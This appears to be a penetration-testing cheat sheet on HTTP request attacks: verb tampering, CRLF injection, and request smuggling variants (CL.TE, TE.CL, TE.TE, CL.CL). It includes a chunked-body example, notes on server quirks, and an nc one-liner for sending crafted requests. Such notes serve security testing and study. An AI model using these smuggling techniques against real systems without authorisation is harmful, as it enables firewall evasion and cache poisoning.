HTTP Requests ¶

HTTP Verb Tampering ¶

If the webserver is misconfigured or the code contains logic flaws, another HTTP method might be accepted while we are denied access with the 'intended' forbidden HTTP methods.

• Ex: A website expecting a POST request but using $_REQUEST may be vulnerable to injection using GET (Refer to Logic Flaws)

• Ex: A website using .htaccess to request a password might be misconfigured and bypassed using GETS or PUT etc.

HTTP CRLF Attack ¶

CRLF Injection can be used for request smuggling or log corruption. For instance, it may be used to insert malicious logs.

HTTP Request Smuggling ¶

Request Smuggling occurs request that is interpreted as two by the back-end while load-balancers/reverse proxies only saw one request.

When both Content-Length (CL) and Transfer-Encoding (TE) are present, each solution may differently interpret the size of the request.

📚 Usage: evade firewalls, cache poisoning, etc.

...
Transfer-Encoding: chunked
    
e              // size of data
Hello, World!  // data (13+1 bytes for \n)
0              // end

• CL.TE: use Content-Length with first chunk 0
• TE.CL: use Content-Length: (n+2) with n the size in bytes of the chunk. No need to TE in the request in the chunk.
• TE.TE: try TE header twice and use an invalid header value like Transfer-Encoding: chunked1 for the second. Maybe the first intermediary will ignore it while the second would fall back to CL.
• CL.CL: try using two CL with first size 0

📚 For old ATS servers, \0 in header-value or long header values (65536+) may do the trick too.

📚 ATS uses CL (👻). Nginx uses TE (👻).

• HTTP Header Injection

$ nc -q 1 IP PORT <<< cat request.txt
$ zaproxy # but uncheck options "fixing" the request